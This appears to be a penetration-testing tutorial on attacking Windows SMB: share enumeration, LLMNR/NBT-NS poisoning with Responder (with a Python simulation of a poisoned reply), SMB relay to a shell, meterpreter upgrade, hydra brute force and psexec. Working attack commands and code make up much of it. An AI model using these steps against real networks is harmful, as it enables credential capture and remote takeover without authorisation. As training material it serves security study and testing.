Description
Port 445 (microsoft-ds, listed by nmap as "Microsoft Directory Services") carries SMB directly over TCP. Before Windows 2000, SMB ran on top of NetBIOS over TCP/IP (NBT): name resolution on UDP 137, datagrams on UDP 138 and the NetBIOS Session Service on TCP 139. TCP was always there; what changed with Windows 2000 is that SMB no longer needs the NetBIOS layer and can be hosted directly on TCP 445.
Modern Windows hosts usually expose both ports, and the same shares and authentication are reachable through either, so when 445 is filtered it is worth trying 139.
netbios-ssn (NetBIOS Session Service)

Enumeration
A good first step is to enumerate the available shares with smbmap, which lists every share together with the access (READ, WRITE, NO ACCESS) the supplied credentials have on it. An empty username and password test a null session:

smbmap -u "" -p "" -H $IP

nmap also has a large set of SMB NSE scripts (smb-enum-shares, smb-enum-users, smb-os-discovery, smb-security-mode, smb2-security-mode, the smb-vuln-* checks and more), which you can launch together with:

nmap -p 445 --script=smb* -oX ./nmap/smb.xml $IP

Be aware that smb* also matches smb-brute and smb-flood, so on a target where lockouts or noise matter, name the scripts explicitly instead of using the wildcard.

If you find shares that you can read and/or write, smbclient can be used to browse the share and retrieve files from it. With credentials:

smbclient \\\\$IP\\$SHARE "$PASSWORD" -U "$USERNAME"

or as a null session (-N sends no password):

smbclient \\\\$IP\\$SHARE -N

Inside the smbclient prompt, ls, cd and get list the current directory, move to another directory and download a file respectively. help displays the available commands.
Exploitation
Capturing Net-NTLM Hashes (LLMNR/NBT-NS Poisoning)
Both LLMNR (Link-Local Multicast Name Resolution, UDP 5355) and NBT-NS (NetBIOS Name Service, UDP 137) are used in Windows environments as a fallback when resolving a hostname via DNS fails. Any host on the same segment can answer these queries and the answer is not authenticated.
When a machine resolves a hostname to the attacker's address and then connects to it (SMB, HTTP, WPAD and so on), it authenticates with NTLM, and what the attacker captures is the Net-NTLMv1/v2 challenge-response that Responder prints as a "hash", not the NT hash itself. It cannot be replayed for pass-the-hash, but it can be cracked offline (hashcat modes 5500 and 5600) or relayed while the session is live.
- A machine on the network tries to connect to a hostname that DNS cannot resolve (a mistyped share path, a stale mapped drive, a missing WPAD entry)
- The machine multicasts an LLMNR query and broadcasts an NBT-NS query asking who owns this hostname
- The attacker answers the query with its own IP address, pretending to be that host
- The machine connects to the attacker and sends its username and Net-NTLMv1/v2 response
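The exchange in the list above, as an added example that is not part of the original page and not Responder's code: it builds the victim's LLMNR query, builds the attacker's poisoned answer for it, parses the answer the way the victim would, and also shows the NBT-NS first-level name encoding that the parallel UDP 137 broadcast uses. The hostname fileserv01, the transaction id and the attacker address 10.0.0.5 are constructed values; nothing is sent on the network.

```python
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # LLMNR multicast group and port (RFC 4795)
NBNS_PORT = 137                                  # NBT-NS goes to the subnet broadcast address


def encode_dns_name(name: str) -> bytes:
    """DNS label encoding, shared by DNS and LLMNR: length-prefixed labels, 0x00 terminator."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_dns_name(buf: bytes, off: int):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode())
        off += n


def llmnr_query(txid: int, hostname: str) -> bytes:
    """Step 2: the victim's question. DNS-shaped header (id, flags, QD, AN, NS, AR), one question."""
    return (struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
            + encode_dns_name(hostname) + struct.pack(">HH", 1, 1))   # QTYPE A, QCLASS IN


def parse_llmnr(pkt: bytes) -> dict:
    """Parse a query, or a response carrying a single A record."""
    txid, flags, _, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    name, off = decode_dns_name(pkt, 12)
    qtype, _ = struct.unpack(">HH", pkt[off:off + 4])
    off += 4
    out = {"txid": txid, "is_response": bool(flags & 0x8000), "name": name, "qtype": qtype}
    if an:
        _, off = decode_dns_name(pkt, off)
        _, _, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        out["answer"] = ".".join(str(b) for b in pkt[off + 10:off + 10 + rdlen])
        out["ttl"] = ttl
    return out


def llmnr_poison_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Step 3: the attacker's answer. Same transaction id, QR bit set, question echoed,
    one A record pointing at the attacker. Nothing in this packet is signed or verified."""
    q = parse_llmnr(query)
    question = encode_dns_name(q["name"]) + struct.pack(">HH", q["qtype"], 1)
    answer = (encode_dns_name(q["name"]) + struct.pack(">HHIH", 1, 1, ttl, 4)
              + bytes(int(octet) for octet in attacker_ip.split(".")))
    return struct.pack(">HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0) + question + answer


def nbns_encode_name(name: str, suffix: int = 0x20) -> bytes:
    """NBT-NS first-level encoding: name space-padded to 15 chars plus a suffix byte
    (0x20 = file server service), each byte split into two nibbles written as 'A' + nibble,
    wrapped as a single 32-byte label."""
    raw = name.upper().ljust(15)[:15].encode() + bytes([suffix])
    encoded = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return b"\x20" + encoded + b"\x00"


def nbns_decode_name(buf: bytes):
    encoded = buf[1:33]
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode().rstrip(" "), raw[15]


def simulate(hostname: str, attacker_ip: str) -> str:
    """Steps 1 to 3 end to end: the victim asks, the attacker answers, the victim is left
    holding the attacker's address and will connect to it in step 4."""
    query = llmnr_query(0x1234, hostname)                  # victim -> 224.0.0.252:5355
    response = llmnr_poison_response(query, attacker_ip)  # attacker -> victim, unicast
    return parse_llmnr(response)["answer"]


if __name__ == "__main__":
    print("victim will connect to", simulate("fileserv01", "10.0.0.5"))
    print("NBT-NS encoded name:", nbns_encode_name("FILESERV01"))
```

In a real poisoning run the attacker must answer before a legitimate host does and must answer every name it sees (that is what Responder's listeners do); the response itself carries no proof of who sent it, which is the whole weakness.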
python3 Responder.py -I $INTERFACE --lm

-I selects the interface to poison on; --lm forces an LM hashing downgrade for Windows XP/2003-era clients so the weaker NTLMv1 response is captured where possible.

SMB Relay Attack
For this attack to work, SMB signing must be disabled, or enabled but not required, on the relay target; that is the default on workstations and on member servers, while domain controllers require it. Check it beforehand with nmap's smb-security-mode and smb2-security-mode scripts. The user whose session is relayed must also be a local administrator on the target, because the relay uses the authenticated session to execute code there. The target does not have to be the host the victim was trying to reach, only one that accepts the victim's credentials. Before starting MultiRelay, set SMB = Off and HTTP = Off in Responder.conf so that Responder hands those connections to the relay instead of answering them itself.
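One way to check the signing precondition above without re-scanning, as an added example that is not part of the original page: parse the XML written by the nmap command from the Enumeration section (-oX ./nmap/smb.xml) and list the hosts whose smb-security-mode / smb2-security-mode output shows signing is not enforced, which are the only sensible values for MultiRelay's -t. The embedded XML is a constructed sample that mimics the shape of those two scripts' output; the addresses in it are made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample of the relevant part of an nmap -oX file, shaped like the output of
#   nmap -p 445 --script=smb* -oX ./nmap/smb.xml <targets>
# Host .5 does not enforce signing, .6 requires it, .7 has no signing verdict at all.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  3:1:1: &#xa;    Message signing enabled but not required"/>
      <script id="smb-security-mode" output="&#xa;  account_used: guest&#xa;  authentication_level: user&#xa;  challenge_response: supported&#xa;  message_signing: disabled (dangerous, but default)"/>
    </hostscript>
  </host>
  <host><address addr="10.10.10.6" addrtype="ipv4"/>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  3:1:1: &#xa;    Message signing enabled and required"/>
    </hostscript>
  </host>
  <host><address addr="10.10.10.7" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-os-discovery" output="OS: Windows Server 2016"/>
    </hostscript>
  </host>
</nmaprun>
"""

# Weakest to strongest; a host's status is the weakest verdict any signing script gave.
RANK = {"disabled": 0, "not required": 1, "required": 2}


def classify(output):
    """Map the free-text output of smb-security-mode / smb2-security-mode to a verdict."""
    s = output.lower()
    if "enabled and required" in s or "message_signing: required" in s:
        return "required"
    if "enabled but not required" in s or "message_signing: supported" in s:
        return "not required"
    if "signing disabled" in s or "message_signing: disabled" in s:
        return "disabled"
    return None


def signing_status(xml_text):
    """Return {ip: verdict} for every host where a signing script produced a verdict."""
    status = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for script in host.iter("script"):
            if script.get("id") not in ("smb-security-mode", "smb2-security-mode"):
                continue
            verdict = classify(script.get("output", ""))
            if verdict is None:
                continue
            if ip not in status or RANK[verdict] < RANK[status[ip]]:
                status[ip] = verdict
    return status


def relay_targets(xml_text):
    """Hosts that would accept a relayed, unsigned session: candidates for MultiRelay -t."""
    return sorted(ip for ip, verdict in signing_status(xml_text).items() if verdict != "required")


if __name__ == "__main__":
    for ip, verdict in signing_status(SAMPLE_XML).items():
        print(f"{ip:15} signing {verdict}")
    print("relay candidates:", relay_targets(SAMPLE_XML))
```

Hosts with no verdict (like .7 in the sample) are deliberately left out rather than assumed relayable; rescan them with the two security-mode scripts named explicitly before relying on them.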
With Responder.py still running to do the poisoning:

python3 MultiRelay.py -t $TARGET_IP -u ALL

-u ALL relays every user that gets poisoned; giving it a comma-separated list of known administrators instead avoids wasting sessions of users who have no rights on the target. A successful relay results in a shell on the target.
To upgrade to a meterpreter shell, generate a payload with msfvenom, then upload it from the MultiRelay shell with:

upload $LOCAL_PATH_TO_PAYLOAD

Start a handler in msfconsole (exploit/multi/handler with the same payload, LHOST and LPORT that msfvenom was given), then execute the uploaded binary on the target (MultiRelay reports where it stored the file; run it from that path):

$LOCAL_PATH_TO_PAYLOAD

Brute Force
hydra -L $USERS_LIST -P $PASSWORDS_LIST $IP smb

Check the account lockout policy before running a wordlist against SMB: a password spray (one or two passwords across many users) is usually safer against domain accounts than a full dictionary per user.

Shell
If you have a username/password combination, you can use msfconsole to get a meterpreter shell over SMB with psexec. The account needs local administrator rights on the target, because the module writes a service binary to an admin share and starts it; set RHOSTS, SMBUser, SMBPass (and SMBDomain for a domain account) before running it:

msfconsole
use exploit/windows/smb/psexec